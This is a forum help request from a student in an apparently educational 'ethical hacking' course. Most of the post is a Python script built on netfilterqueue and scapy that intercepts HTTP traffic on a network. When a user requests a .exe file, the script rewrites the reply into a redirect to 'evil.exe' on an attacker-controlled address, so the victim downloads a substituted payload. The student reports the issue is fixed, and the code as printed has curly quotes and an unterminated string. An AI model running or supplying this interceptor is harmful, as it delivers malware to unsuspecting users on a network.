Section 8: Writing a File Interceptor - Modifying HTTP Responses on The Fly - Python for ethical hacking by Zaid

In Python for ethical hacking course by Zaid, I was able to sniff the packet and route the URL to a secondary site whenever user tries to download a .exe file. However in the redirect URL a guess a content encoding is sent along with the redirect packet. Please help me to fix the issue. Code as below,

#!/usr/bin/env python3.7
import netfilterqueue
import scapy.all as scapy

ack_list = []

def process_packet(packet):
scapy_packet = scapy.IP(packet.get_payload()) #You are wrapping the payload with IP layer to get more info.
if scapy_packet.haslayer(scapy.Raw):
#print(scapy_packet.show())
if scapy_packet[scapy.TCP].dport == 80:
print(“HTTP Request”)
if “.exe” in str(scapy_packet[scapy.Raw].load):
ack_list.append(scapy_packet[scapy.TCP].ack)
#print(scapy_packet.show())
elif scapy_packet[scapy.TCP].sport == 80:
if scapy_packet[scapy.TCP].seq in ack_list:
ack_list.remove(scapy_packet[scapy.TCP].seq)
print(“HTTP Response”)
print("[+] Replacing file")
scapy_packet[scapy.Raw].load = “HTTP/1.1 301 Moved Permanently\nLocation: http://10.0.2.15/evil.exe\n\n
del scapy_packet[scapy.IP].len
del scapy_packet[scapy.IP].chksum
del scapy_packet[scapy.TCP].chksum
packet.set_payload(bytes(scapy_packet))
#print(scapy_packet.show())

packet.accept()

queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()

As you can see, the redirect URL has some extra encoding but if you see in the code , i have made proper decoding and encoding using str and decode functions.

image

This issue is fixed. Thanks.